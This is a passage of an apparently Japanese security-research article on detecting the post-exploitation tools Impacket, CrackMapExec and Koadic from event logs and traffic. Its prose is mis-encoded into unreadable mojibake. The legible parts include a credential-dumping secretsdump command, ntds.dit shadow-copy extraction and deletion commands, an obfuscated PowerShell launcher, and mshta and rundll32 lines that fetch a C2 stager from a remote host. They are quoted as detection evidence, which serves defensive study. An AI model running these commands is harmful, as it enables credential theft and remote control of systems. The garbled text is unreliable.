äŒæ¥éšéã«ãããæ»æã®æ°ã¯å¹Žã
å¢å ããŠããŸããããšãã°ã
ãããã®ããŒã«ã¯æåã®äŸµå
¥ã§ã¯ãªããã€ã³ãã©ã¹ãã©ã¯ãã£å
ã§æ»æãå±éããããã«äœ¿çšãããããšã«æ³šæããŠãã ããã æ»æè
ã¯ãå¢çãçªç ŽããåŸã®æ»æã®ããŸããŸãªæ®µéã§ãããã䜿çšããŸãã ã¡ãªã¿ã«ããããæ€åºããã®ã¯é£ãããå€ãã®å Žåããã¯ãããžãŒã®å©ããåããŠã®ã¿æ€åºãããŸãã
ç§ãã¡ãããå¿ èŠããã£ãããš:
- ãããã³ã°ããŒã«ãã©ã®ããã«æ©èœããããç解ããã æ»æè ãäœãæªçšããå¿ èŠãããã®ãââããŸãã©ã®ãããªãã¯ãããžãŒãå©çšã§ããã®ãã調ã¹ãŸãã
- æ»æã®æåã®æ®µéã§æ å ±ã»ãã¥ãªãã£ããŒã«ã«ãã£ãŠæ€åºãããªãã£ããã®ãèŠã€ããã æ»æè ãå éšæ»æè ã§ããããæ»æè ããããŸã§ç¥ãããŠããªãã£ãã€ã³ãã©ã¹ãã©ã¯ãã£ã®ããŒã«ãæªçšããŠããããã«ãåµå¯ãã§ãŒãºãã¹ããããããå¯èœæ§ããããŸãã 圌ã®è¡åã®é£éå šäœã埩å ããããšãå¯èœã«ãªãããããããªãåããæ€åºããããšãã欲æ±ãçãŸããŸãã
- äŸµå ¥æ€ç¥ããŒã«ããã®èª€æ€ç¥ãæé€ããã åµå¯ã®ã¿ã«åºã¥ããŠç¹å®ã®è¡åãæ€åºãããå Žåãé »ç¹ã«ãšã©ãŒãçºçããå¯èœæ§ãããããšãå¿ããŠã¯ãªããŸããã éåžžãã€ã³ãã©ã¹ãã©ã¯ãã£ã«ã¯ãäžèŠããã ãã§ã¯æ£èŠã®æ¹æ³ãšåºå¥ã§ããªããæ å ±ãååŸããããã®ååãªæ°ã®æ¹æ³ãååšããŸãã
ãããã®ããŒã«ã¯æ»æè ã«äœãäžããã®ã§ãããã? ããã Impacket ã®å Žåãæ»æè ã¯å¢çãçªç ŽããåŸã«ç¶ãæ»æã®ããŸããŸãªæ®µéã§äœ¿çšã§ããã¢ãžã¥ãŒã«ã®å€§èŠæš¡ãªã©ã€ãã©ãªãåãåããŸãã Metasploit ãªã©ãå€ãã®ããŒã«ã¯å éšã§ Impacket ã¢ãžã¥ãŒã«ã䜿çšããŸãã ãªã¢ãŒãã³ãã³ãå®è¡çšã® dcomexec ãš wmiexecãImpacket ããè¿œå ãããã¢ã«ãŠã³ããã¡ã¢ãªããååŸããããã® Secretsdump ããããŸãã çµæãšããŠããã®ãããªã©ã€ãã©ãªãŒã®æŽ»æ§ãæ£ããæ€åºããããšã§ãèªå°äœã®æ€åºã確å®ã«ãªããŸãã
äœæè ã CrackMapExec (ãŸãã¯åã« CME) ã«ã€ããŠãPowered by Impacketããæžããã®ã¯å¶ç¶ã§ã¯ãããŸããã ããã«ãCME ã«ã¯ããã¹ã¯ãŒããŸãã¯ãã®ããã·ã¥ãååŸããããã® Mimikatzããªã¢ãŒãå®è¡ã®ããã® Meterpreter ãŸã㯠Empire ãšãŒãžã§ã³ãã®å®è£ ãããã³ãªã³ããŒãã® Bloodhound ãªã©ãäžè¬çãªã·ããªãªã«å¯Ÿå¿ããæ¢è£œã®æ©èœããããŸãã
ç§ãã¡ãéžæãã 25 çªç®ã®ããŒã«ã¯ Koadic ã§ãã ããã¯ããæè¿ã®ãã®ã§ã2017 幎ã®åœéããã«ãŒäŒè° DEFCON 3 ã§çºè¡šãããŸããããHTTPãJava Scriptãããã³ Microsoft Visual Basic Scââript (VBS) ãä»ããŠåäœãããšããéæšæºçãªã¢ãããŒããç¹åŸŽã§ãã ãã®ã¢ãããŒãã¯ãåå°ããã®ç掻ãšåŒã°ããŸãããã®ããŒã«ã¯ãWindows ã«çµã¿èŸŒãŸããŠããäžé£ã®äŸåé¢ä¿ãšã©ã€ãã©ãªã䜿çšããŸãã äœæè ã¯ããã COM ã³ãã³ã & ã³ã³ãããŒã« (CXNUMX) ãšåŒãã§ããŸãã
è¡æ
Impacket ã®æ©èœã¯éåžžã«å¹ åºããAD å éšã®åµå¯ãå éš MS SQL ãµãŒããŒããã®ããŒã¿åéãããè³æ Œæ å ±ãååŸããããã®ãã¯ãã㯠(ãã㯠SMB ãªã¬ãŒæ»æ)ãããã³ãã¡ã€ã³ ã³ã³ãããŒã©ãŒããã®ãŠãŒã¶ãŒ ãã¹ã¯ãŒãã®ããã·ã¥ãå«ã ntds.dit ãã¡ã€ã«ã®ååŸãŸã§å€å²ã«ããããŸãã ãŸããImpacket ã¯ãWMIãWindows ã¹ã±ãžã¥ãŒã©ç®¡çãµãŒãã¹ãDCOMãSMB ã® XNUMX ã€ã®ç°ãªãæ¹æ³ã䜿çšããŠã³ãã³ãããªã¢ãŒãã§å®è¡ããŸããããã®ããã«ã¯è³æ Œæ å ±ãå¿ èŠã§ãã
ç§å¯ãã³ã
Secretsdump ãèŠãŠã¿ãŸãããã ããã¯ããŠãŒã¶ãŒ ãã·ã³ãšãã¡ã€ã³ ã³ã³ãããŒã©ãŒã®äž¡æ¹ãã¿ãŒã²ããã«ã§ããã¢ãžã¥ãŒã«ã§ãã ããã¯ã¡ã¢ãªé å LSAãSAMãSECURITYãNTDS.dit ã®ã³ããŒãååŸããããã«äœ¿çšã§ãããããæ»æã®ããŸããŸãªæ®µéã§ç¢ºèªãããå¯èœæ§ããããŸãã ã¢ãžã¥ãŒã«æäœã®æåã®ã¹ããã㯠SMB çµç±ã®èªèšŒã§ããããã«ã¯ãPass the Hash æ»æãèªåçã«å®è¡ããããã«ãŠãŒã¶ãŒã®ãã¹ã¯ãŒããŸãã¯ãã®ããã·ã¥ãå¿ èŠã§ãã 次ã«ãService Control Manager (SCM) ãžã®ã¢ã¯ã»ã¹ããªãŒãã³ããwinreg ãããã³ã«çµç±ã§ã¬ãžã¹ããªã«ã¢ã¯ã»ã¹ãããªã¯ãšã¹ããæ¥ãŸããæ»æè ã¯ããã䜿çšããŠã察象ã®ãã©ã³ãã®ããŒã¿ãèŠã€ãåºããSMB çµç±ã§çµæãååŸã§ããŸãã
å³ã§ã¯ã 1 ã§ã¯ãwinreg ãããã³ã«ã䜿çšããå ŽåãLSA ãæã€ã¬ãžã¹ã㪠ããŒã䜿çšããŠã¢ã¯ã»ã¹ãã©ã®ããã«ååŸããããã確èªããŸãã ãããè¡ãã«ã¯ããªãã³ãŒã 15 - OpenKey ãæå®ã㊠DCERPC ã³ãã³ãã䜿çšããŸãã
ç±³ã 1. winreg ãããã³ã«ã䜿çšããŠã¬ãžã¹ã㪠ããŒãéã
次ã«ãããŒãžã®ã¢ã¯ã»ã¹ãååŸããããšãå€ã¯ãªãã³ãŒã 20 ã® SaveKey ã³ãã³ãã§ä¿åãããŸããImpacket ã¯ãããéåžžã«ç¹æ®ãªæ¹æ³ã§è¡ããŸãã å€ã¯ã.tmp ãè¿œå ããã 8 ã€ã®ã©ã³ãã ãªæååãååãšãããã¡ã€ã«ã«ä¿åãããŸãã ããã«ããã®ãã¡ã€ã«ã¯ System32 ãã£ã¬ã¯ããªãã SMB çµç±ã§ããã«ã¢ããããŒããããŸã (å³ 2)ã
ç±³ã 2. ãªã¢ãŒããã·ã³ããã¬ãžã¹ããªããŒãååŸããä»çµã¿
ãããã¯ãŒã¯äžã®ãã®ãããªã¢ã¯ãã£ããã£ã¯ãwinreg ãããã³ã«ãç¹å®ã®ååãã³ãã³ããããã³ãããã®é åºã䜿çšããç¹å®ã®ã¬ãžã¹ã㪠ãã©ã³ããžã®ã¯ãšãªã«ãã£ãŠæ€åºã§ããããšãå€æããŸããã
ãã®ã¢ãžã¥ãŒã«ã¯ Windows ã€ãã³ã ãã°ã«ãçè·¡ãæ®ããããæ€åºã容æã«ãªããŸãã ããšãã°ãã³ãã³ããå®è¡ããçµæã
secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC
Windows Server 2016 ãã°ã«ã¯ã次ã®äž»èŠãªã€ãã³ã ã·ãŒã±ã³ã¹ã衚瀺ãããŸãã
1. 4624 - ãªã¢ãŒã ãã°ãªã³ã
2. 5145 - winreg ãªã¢ãŒã ãµãŒãã¹ãžã®ã¢ã¯ã»ã¹æš©ã確èªããŸãã
3. 5145 - System32 ãã£ã¬ã¯ããªå
ã®ãã¡ã€ã« ã¢ã¯ã»ã¹æš©ããã§ãã¯ããŸãã ãã¡ã€ã«ã«ã¯äžèšã®ã©ã³ãã ãªååãä»ããããŸãã
4. 4688 - vssadmin ãèµ·åãã cmd.exe ããã»ã¹ãäœæããŸãã
âC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - 次ã®ã³ãã³ãã䜿çšããŠããã»ã¹ãäœæããŸãã
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
6. 4688 - 次ã®ã³ãã³ãã䜿çšããŠããã»ã¹ãäœæããŸãã
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
7. 4688 - 次ã®ã³ãã³ãã䜿çšããŠããã»ã¹ãäœæããŸãã
"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
SMBEXEC
å€ãã®ãã¹ããšã¯ã¹ããã€ãããŒã«ãšåæ§ã«ãImpacket ã«ã¯ã³ãã³ãããªã¢ãŒãã§å®è¡ããããã®ã¢ãžã¥ãŒã«ããããŸãã ããã§ã¯ããªã¢ãŒã ãã·ã³äžã§å¯Ÿè©±åã®ã³ãã³ã ã·ã§ã«ãæäŸãã smbexec ã«çŠç¹ãåœãŠãŸãã ãã®ã¢ãžã¥ãŒã«ã§ã¯ããã¹ã¯ãŒããŸãã¯ãã¹ã¯ãŒã ããã·ã¥ã䜿çšãã SMB çµç±ã®èªèšŒãå¿ èŠã§ãã å³ã§ã¯ã å³ 3 ã¯ããã®ãããªããŒã«ãã©ã®ããã«æ©èœãããã瀺ãäŸã§ãããã®å Žåã¯ããŒã«ã«ç®¡çè ã³ã³ãœãŒã«ã§ãã
ç±³ã 3. ã€ã³ã¿ã©ã¯ãã£ã㪠smexec ã³ã³ãœãŒã«
èªèšŒåŸã® smbexec ã®æåã®ã¹ãããã¯ãOpenSCManagerW ã³ãã³ã (15) ã䜿çšã㊠SCM ãéãããšã§ãã ãã®ã¯ãšãªã¯æ³šç®ã«å€ããŸããMachineName ãã£ãŒã«ãã DUMMY ã§ãã
ç±³ã 4. ãµãŒãã¹ ã³ã³ãããŒã« ãããŒãžã£ãŒãéãèŠæ±
次ã«ãCreateServiceW ã³ãã³ãã䜿çšããŠãµãŒãã¹ãäœæããŸã (12)ã smbexec ã®å Žåãæ¯ååãã³ãã³ãæ§ç¯ããžãã¯ãèŠãããŸãã å³ã§ã¯ã 5 ç·è²ã¯å€æŽã§ããªãã³ãã³ã ãã©ã¡ãŒã¿ã瀺ããé»è²ã¯æ»æè ãå€æŽã§ãããã®ã瀺ããŸãã å®è¡å¯èœãã¡ã€ã«ããã®ãã£ã¬ã¯ããªãããã³åºåãã¡ã€ã«ã®ååãå€æŽã§ããããšã¯ç°¡åã«ããããŸãããImpacket ã¢ãžã¥ãŒã«ã®ããžãã¯ã劚ããã«æ®ããå€æŽããã®ã¯éåžžã«å°é£ã§ãã
ç±³ã 5. Service Control Managerã䜿çšããŠãµãŒãã¹ã®äœæãèŠæ±ããŸãã
Smbexec 㯠Windows ã€ãã³ã ãã°ã«ãæãããªçè·¡ãæ®ããŸãã ipconfig ã³ãã³ãã䜿çšãã察話åã³ãã³ã ã·ã§ã«ã® Windows Server 2016 ãã°ã«ã¯ã次ã®ã㌠ã·ãŒã±ã³ã¹ã®ã€ãã³ããèšé²ãããŸãã
1. 4697 â 被害è ã®ãã·ã³ãžã®ãµãŒãã¹ã®ã€ã³ã¹ããŒã«:
%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
2. 4688 - ãã€ã³ã 1 ã®åŒæ°ã䜿çšã㊠cmd.exe ããã»ã¹ãäœæããŸãã
3. 5145 - C$ ãã£ã¬ã¯ããªå
ã® __output ãã¡ã€ã«ãžã®ã¢ã¯ã»ã¹æš©ããã§ãã¯ããŠããŸãã
4. 4697 â 被害è
ã®ãã·ã³ãžã®ãµãŒãã¹ã®ã€ã³ã¹ããŒã«ã
%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat
5. 4688 - ãã€ã³ã 4 ã®åŒæ°ã䜿çšã㊠cmd.exe ããã»ã¹ãäœæããŸãã
6. 5145 - C$ ãã£ã¬ã¯ããªå
ã® __output ãã¡ã€ã«ãžã®ã¢ã¯ã»ã¹æš©ããã§ãã¯ããŠããŸãã
Impacket ã¯æ»æããŒã«éçºã®åºç€ã§ãã Windows ã€ã³ãã©ã¹ãã©ã¯ãã£ã®ã»ãŒãã¹ãŠã®ãããã³ã«ããµããŒãããåæã«ç¬èªã®ç¹åŸŽçãªæ©èœãåããŠããŸãã ããã§ã¯ãå ·äœç㪠winreg ãªã¯ãšã¹ããç¹åŸŽçãªã³ãã³ã圢åŒã«ãã SCM API ã®äœ¿çšããã¡ã€ã«å圢åŒãããã³ SMB å ±æ SYSTEM32 ã«ã€ããŠèª¬æããŸãã
ã¯ã©ãã¯ããããšã¯ãŒã¯
CME ããŒã«ã¯äž»ã«ãæ»æè ããããã¯ãŒã¯å ã«äŸµå ¥ããããã«å®è¡ããå¿ èŠãããæ¥åžžçãªã¢ã¯ã·ã§ã³ãèªååããããã«èšèšãããŠããŸãã ããã«ãããæå㪠Empire ãšãŒãžã§ã³ãã Meterpreter ãšé£æºããŠäœæ¥ã§ããããã«ãªããŸãã ã³ãã³ããç§å¯è£ã«å®è¡ããããã«ãCME ã¯ã³ãã³ããé£èªåã§ããŸãã Bloodhound (å¥ã®åµå¯ããŒã«) ã䜿çšãããšãæ»æè ã¯ã¢ã¯ãã£ããªãã¡ã€ã³ç®¡çè ã»ãã·ã§ã³ã®æ€çŽ¢ãèªååã§ããŸãã
ãã©ããããŠã³ã
Bloodhound ã¯ã¹ã¿ã³ãã¢ãã³ ããŒã«ãšããŠããããã¯ãŒã¯å ã®é«åºŠãªåµå¯ãå¯èœã«ããŸãã ãŠãŒã¶ãŒããã·ã³ãã°ã«ãŒããã»ãã·ã§ã³ã«é¢ããããŒã¿ãåéããPowerShell ã¹ã¯ãªãããŸãã¯ãã€ã㪠ãã¡ã€ã«ãšããŠæäŸãããŸãã æ å ±ã®åéã«ã¯ãLDAP ãŸã㯠SMB ããŒã¹ã®ãããã³ã«ã䜿çšãããŸãã CME çµ±åã¢ãžã¥ãŒã«ã䜿çšãããšãBloodhound ã被害è ã®ãã·ã³ã«ããŠã³ããŒãããŠå®è¡ããå®è¡åŸã«åéãããããŒã¿ãåãåãããšãã§ãããããã·ã¹ãã å ã®ã¢ã¯ã·ã§ã³ãèªååãããç®ç«ããªããªããŸãã Bloodhound ã°ã©ãã£ã«ã« ã·ã§ã«ã¯ãåéããããŒã¿ãã°ã©ãã®åœ¢åŒã§è¡šç€ºãããããæ»æè ã®ãã·ã³ãããã¡ã€ã³ç®¡çè ãŸã§ã®æçãã¹ãèŠã€ããããšãã§ããŸãã
ç±³ã 6.ãã©ããããŠã³ãã€ã³ã¿ãŒãã§ãŒã¹
被害è ã®ãã·ã³ã§å®è¡ããããã«ãã¢ãžã¥ãŒã«ã¯ ATSVC ãš SMB ã䜿çšããŠã¿ã¹ã¯ãäœæããŸãã ATSVC ã¯ãWindows ã¿ã¹ã¯ ã¹ã±ãžã¥ãŒã©ãæäœããããã®ã€ã³ã¿ãŒãã§ã€ã¹ã§ãã CME ã¯ãNetrJobAdd(1) é¢æ°ã䜿çšããŠããããã¯ãŒã¯äžã§ã¿ã¹ã¯ãäœæããŸãã CME ã¢ãžã¥ãŒã«ãéä¿¡ãããã®ã®äŸãå³ã«ç€ºããŸãã 7: ãã㯠cmd.exe ã³ãã³ãåŒã³åºããšãXML 圢åŒã®åŒæ°åœ¢åŒã®é£èªåãããã³ãŒãã§ãã
å³7ã CME çµç±ã§ã¿ã¹ã¯ãäœæãã
ã¿ã¹ã¯ãå®è¡ã®ããã«éä¿¡ãããåŸã被害è ã®ãã·ã³ã¯ Bloodhound èªäœãèµ·åããŸããããã¯ãã©ãã£ãã¯ã§ç¢ºèªã§ããŸãã ãã®ã¢ãžã¥ãŒã«ã®ç¹åŸŽã¯ãæšæºã°ã«ãŒãããã¡ã€ã³å ã®ãã¹ãŠã®ãã·ã³ãšãŠãŒã¶ãŒã®ãªã¹ããååŸããSRVSVC NetSessEnum ãªã¯ãšã¹ããéããŠã¢ã¯ãã£ããªãŠãŒã¶ãŒ ã»ãã·ã§ã³ã«é¢ããæ å ±ãååŸãã LDAP ã¯ãšãªã«ãã£ãŠç¹åŸŽä»ããããŸãã
ç±³ã 8. SMB çµç±ã§ã¢ã¯ãã£ããªã»ãã·ã§ã³ã®ãªã¹ããååŸãã
ããã«ãç£æ»ãæå¹ã«ããŠè¢«å®³è
ã®ãã·ã³ã§ Bloodhound ãèµ·åãããšãID 4688 (ããã»ã¹äœæ) ãšããã»ã¹åãæã€ã€ãã³ããçºçããŸãã «C:WindowsSystem32cmd.exe»
ã 泚ç®ãã¹ãç¹ã¯ãã³ãã³ãã©ã€ã³åŒæ°ã§ãã
cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , ⊠, 40,41 )-jOIN'' ) "
Enum_avproducts
enum_avproducts ã¢ãžã¥ãŒã«ã¯ãæ©èœãšå®è£ ã®èŠ³ç¹ããéåžžã«èå³æ·±ããã®ã§ãã WMI ã䜿çšãããšãWQL ã¯ãšãªèšèªã䜿çšããŠããŸããŸãª Windows ãªããžã§ã¯ãããããŒã¿ãååŸã§ããŸããããã¯ãåºæ¬çã«ãã® CME ã¢ãžã¥ãŒã«ã䜿çšãããã®ã§ãã 被害è ã®ãã·ã³ã«ã€ã³ã¹ããŒã«ãããŠããä¿è·ããŒã«ã«é¢ããã¯ãšãªã AntiSpywareProduct ã¯ã©ã¹ãš AntiÐirusProduct ã¯ã©ã¹ã«çæããŸãã å¿ èŠãªããŒã¿ãååŸããããã«ãã¢ãžã¥ãŒã«ã¯ rootSecurityCenter2 åå空éã«æ¥ç¶ããWQL ã¯ãšãªãçæããŠå¿çãåãåããŸãã å³ã§ã¯ã å³ 9 ã¯ããã®ãããªãªã¯ãšã¹ããšã¬ã¹ãã³ã¹ã®å 容ã瀺ããŠããŸãã ãã®äŸã§ã¯ãWindows Defender ãèŠã€ãããŸããã
ç±³ã 9. enum_avproducts ã¢ãžã¥ãŒã«ã®ãããã¯ãŒã¯ ã¢ã¯ãã£ããã£
å€ãã®å ŽåãWMI ç£æ» (WMI ã¢ã¯ãã£ããã£ã®ãã¬ãŒã¹) ãç¡å¹ã«ãªã£ãŠããå ŽåããããŸãããã®ã€ãã³ãã§ã¯ãWQL ã¯ãšãªã«é¢ããæçãªæ å ±ãèŠã€ãããŸãã ãã ããæå¹ã«ãããšãenum_avproducts ã¹ã¯ãªãããå®è¡ããããšãID 11 ã®ã€ãã³ããä¿åããããªã¯ãšã¹ããéä¿¡ãããŠãŒã¶ãŒã®ååãš rootSecurityCenter2 åå空éã®ååãå«ãŸããŸãã
å CME ã¢ãžã¥ãŒã«ã«ã¯ãç¹å®ã® WQL ã¯ãšãªãé£èªåã䜿çšããã¿ã¹ã¯ ã¹ã±ãžã¥ãŒã©ã§ã®ç¹å®ã®çš®é¡ã®ã¿ã¹ã¯ã®äœæãLDAP ããã³ SMB ã§ã® Bloodhound åºæã®ã¢ã¯ãã£ããã£ãªã©ãç¬èªã®ã¢ãŒãã£ãã¡ã¯ãããããŸããã
ã³ã¢ãã£ãã¯
Koadic ã®ç¹åŸŽçãªæ©èœã¯ãWindows ã«çµã¿èŸŒãŸããŠãã JavaScript ããã³ VBScript ã€ã³ã¿ãŒããªã¿ãŒã䜿çšããããšã§ãã ãã®æå³ã§ãããã¯åå°ãé¢ããŠç掻ãããšãããã¬ã³ãã«åŸã£ãŠããŸããã€ãŸããå€éšäŸåããªããæšæºã® Windows ããŒã«ã䜿çšããŸãã ããã¯å®å šãªã³ãã³ãïŒã³ã³ãããŒã« (CnC) ã®ããã®ããŒã«ã§ãããææåŸã«ãã·ã³ã«ãã€ã³ãã©ã³ãããåãä»ãããããã·ã³ãå¶åŸ¡ã§ããããã«ãªããŸãã ãã®ãããªãã·ã³ã¯ã³ã¢ãã£ãã¯çšèªã§ããŸã³ãããšåŒã°ããŸãã 被害è åŽã«å®å šãªæäœãè¡ãããã®ååãªæš©éããªãå ŽåãKoadic ã¯ãŠãŒã¶ãŒ ã¢ã«ãŠã³ãå¶åŸ¡ãã€ãã¹ (UAC ãã€ãã¹) æè¡ã䜿çšããŠæš©éãåŒãäžããæ©èœãåããŠããŸãã
ç±³ã 10.ã³ã¢ãã£ãã¯ã·ã§ã«
被害è ã¯ãCommand & Control ãµãŒããŒãšã®éä¿¡ãéå§ããå¿ èŠããããŸãã ãããè¡ãã«ã¯ãäºåã«æºåãã URI ã«æ¥ç¶ããã¹ããŒãžã£ãŒã® 11 ã€ã䜿çšã㊠Koadic ã®æ¬äœãåä¿¡ããå¿ èŠããããŸãã å³ã§ã¯ã å³ XNUMX ã¯ãmshta ã¹ããŒãžã£ãŒã®äŸã瀺ããŠããŸãã
ç±³ã 11. CnCãµãŒããŒãšã®ã»ãã·ã§ã³ã®åæå
å¿çå€æ° WS ã«åºã¥ããŠãå®è¡ã WScript.Shell ãéããŠè¡ãããå€æ° STAGERãSESSIONKEYãJOBKEYãJOBKEYPATHãEXPIRE ã«çŸåšã®ã»ãã·ã§ã³ã®ãã©ã¡ãŒã¿ãŒã«é¢ããéèŠãªæ å ±ãå«ãŸããŠããããšãããããŸãã ããã¯ãCnC ãµãŒããŒãšã® HTTP æ¥ç¶ã«ãããæåã®èŠæ±ãšå¿çã®ãã¢ã§ãã åŸç¶ã®ãªã¯ãšã¹ãã¯ãåŒã³åºãããã¢ãžã¥ãŒã« (ã€ã³ãã©ã³ã) ã®æ©èœã«çŽæ¥é¢ä¿ããŸãã ãã¹ãŠã® Koadic ã¢ãžã¥ãŒã«ã¯ãCnC ãšã®ã¢ã¯ãã£ããªã»ãã·ã§ã³ã§ã®ã¿åäœããŸãã
ããã«ãã
CME ã Bloodhound ãšé£æºããã®ãšåãããã«ãKoadic ã¯å¥åã®ããã°ã©ã ãšã㊠Mimikatz ãšé£æºããèµ·åããæ¹æ³ãè€æ°ãããŸãã 以äžã¯ãMimikatz ã€ã³ãã©ã³ããããŠã³ããŒãããããã®ãªã¯ãšã¹ããšã¬ã¹ãã³ã¹ã®ãã¢ã§ãã
ç±³ã 12. ããã«ãããã³ã¢ãã£ããã«ç§»ç±
ãªã¯ãšã¹ãã® URI 圢åŒãã©ã®ããã«å€æŽããããã確èªã§ããŸãã ããã«ã¯ãéžæããã¢ãžã¥ãŒã«ãæ åœãã csrf å€æ°ã®å€ãå«ãŸããŠããŸãã 圌女ã®ååã«ã¯æ³šæãæããªãã§ãã ããã CSRF ãéåžžãšã¯ç°ãªã£ãŠç解ãããŠããããšã¯èª°ããç¥ã£ãŠããŸãã ã¬ã¹ãã³ã¹ã¯åãKoadicæ¬äœã«Mimikatzé¢é£ã®ã³ãŒããè¿œå ãããã®ã§ããã ããªãåéãå€ãã®ã§ãèŠç¹ãèŠãŠãããŸãããã ããã«ã¯ãbase64 ã§ãšã³ã³ãŒãããã Mimikatz ã©ã€ãã©ãªããããæ¿å ¥ããã·ãªã¢ã«åããã .NET ã¯ã©ã¹ãããã³ Mimikatz ãèµ·åããããã®åŒæ°ããããŸãã å®è¡çµæã¯å¹³æã§ãããã¯ãŒã¯äžã«éä¿¡ãããŸãã
ç±³ã 13. ãªã¢ãŒã ãã·ã³äžã§ Mimikatz ãå®è¡ããçµæ
Exec_cmd
Koadic ã«ã¯ãã³ãã³ãããªã¢ãŒãã§å®è¡ã§ããã¢ãžã¥ãŒã«ããããŸãã ããã§ã¯ãåã URI çææ¹æ³ãšãããªãã¿ã® sid å€æ°ãš csrf å€æ°ãèŠãŠãããŸãã exec_cmd ã¢ãžã¥ãŒã«ã®å Žåãã·ã§ã« ã³ãã³ããå®è¡ã§ããã³ãŒããæ¬äœã«è¿œå ãããŸãã 以äžã«ãCnC ãµãŒããŒã® HTTP å¿çã«å«ãŸããã³ãŒãã瀺ããŸãã
ç±³ã 14. ã€ã³ãã©ã³ãã³ãŒã exec_cmd
ã³ãŒãã®å®è¡ã«ã¯ãããªãã¿ã® WS å±æ§ãæ〠GAWTUUGCFI å€æ°ãå¿ èŠã§ãã ãã®å©ããåããŠãã€ã³ãã©ã³ãã¯ã·ã§ã«ãåŒã³åºããåºåããŒã¿ ã¹ããªãŒã ãè¿ãshell.execãšè¿ããªãshell.runãšããXNUMXã€ã®ã³ãŒãåå²ãåŠçããŸãã
Koadic ã¯äžè¬çãªããŒã«ã§ã¯ãããŸããããæ£èŠã®ãã©ãã£ãã¯ã§æ€åºã§ããç¬èªã®ã¢ãŒãã£ãã¡ã¯ããæã£ãŠããŸãã
- HTTPãªã¯ãšã¹ãã®ç¹å¥ãªåœ¢åŒã
- winHttpRequests API ã䜿çšããŠã
- ActiveXObject çµç±ã§ WScript.Shell ãªããžã§ã¯ããäœæããŸãã
- 倧ããªå®è¡å¯èœæ¬äœã
åææ¥ç¶ã¯ã¹ããŒãžã£ãŒã«ãã£ãŠéå§ããããããWindows ã€ãã³ããéããŠãã®ã¢ã¯ãã£ããã£ãæ€åºã§ããŸãã mshta ã®å Žåãããã¯ã€ãã³ã 4688 ã§ãããstart å±æ§ãæã€ããã»ã¹ã®äœæã瀺ããŸãã
C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6
Koadic ã®å®è¡äžããããå®å šã«ç¹åŸŽã¥ããå±æ§ãæã€ä»ã® 4688 ã€ãã³ãã確èªã§ããŸãã
rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1
æèŠ
åå°ãé¢ããŠçèšãç«ãŠããšãããã¬ã³ããç¯çœªè
ã®éã§äººæ°ãéããŠããŸãã 圌ãã¯ãããŒãºã«å¿ã㊠Windows ã«çµã¿èŸŒãŸããŠããããŒã«ãšã¡ã«ããºã ã䜿çšããŸãã ãã®ååã«åŸã£ã人æ°ããŒã« KoadicãCrackMapExecãImpacket ã APT ã¬ããŒãã«ç»å Žããããšãå¢ããŠããŸãã ãããã®ããŒã«ã® GitHub äžã®ãã©ãŒã¯ã®æ°ãå¢ããŠãããæ°ãããã©ãŒã¯ãç»å ŽããŠããŸã (çŸåšããã§ã«çŽ XNUMX åãããŸã)ã ãã®ãã¬ã³ãã¯ãã®ã·ã³ãã«ããã人æ°ãéããŠããŸããæ»æè
ã¯ãµãŒãããŒãã£ã®ããŒã«ãå¿
èŠãšããããã§ã«è¢«å®³è
ã®ãã·ã³äžã«ååšããã»ãã¥ãªãã£å¯Ÿçãåé¿ããã®ã«åœ¹ç«ã¡ãŸãã ç§ãã¡ã¯ãããã¯ãŒã¯éä¿¡ã®ç 究ã«éç¹ã眮ããŠããŸããäžèšã®åããŒã«ã¯ãããã¯ãŒã¯ ãã©ãã£ãã¯ã«ç¬èªã®çè·¡ãæ®ããŸãã ãããã詳现ã«ç 究ããããšã§ãç§ãã¡ã®è£œåãæããããšãã§ããŸãã
èè :
- Anton Tyurin æ°ãPositive TechnologiesãPT Expert Security Centerããšãã¹ããŒã ãµãŒãã¹éšé責任è
- Egor Podmokov æ°ãPositive TechnologiesãPT ãšãã¹ããŒã ã»ãã¥ãªã㣠ã»ã³ã¿ãŒããšãã¹ããŒã
åºæïŒ habr.com